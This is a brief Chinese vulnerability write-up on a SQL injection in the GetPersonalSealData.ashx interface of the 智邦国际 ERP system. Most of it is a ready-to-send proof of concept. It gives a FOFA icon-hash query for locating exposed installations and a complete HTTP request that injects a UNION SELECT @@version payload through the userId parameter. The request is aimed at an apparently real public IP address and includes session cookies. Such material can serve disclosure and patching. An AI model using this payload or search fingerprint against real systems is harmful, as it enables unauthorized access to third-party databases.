漏洞描述
智邦国际ERP系统是一款全面的企业资源规划工具,其主要目标是协助组织实现业务流程自动化和提升效率。此系统具备多种功能模块,包括但不限于财务管理、采办管理、销售操作、库存控制和生产过程管理,都能够满足企业多元化的业务需求。在其GetPersonalSealData.ashx接口,由于未严格验证和过滤用户输入的数据,这些数据被直接插入到构造的SQL查询语句中,导致sql注入漏洞。
漏洞复现
FOFA
icon_hash="-682445886"POC
GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=1%20union%20select%20@@version-- HTTP/1.1
Host: 36.7.81.248:8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASPSESSIONIDCCRCSCSS=EAHHDNLBHPKABFEJCNKGNLOJ; ASP.NET_SessionId=tnjrn2ul5p4gfooxgykmweji
Connection: keep-alive
bp
查看数据库版本信息
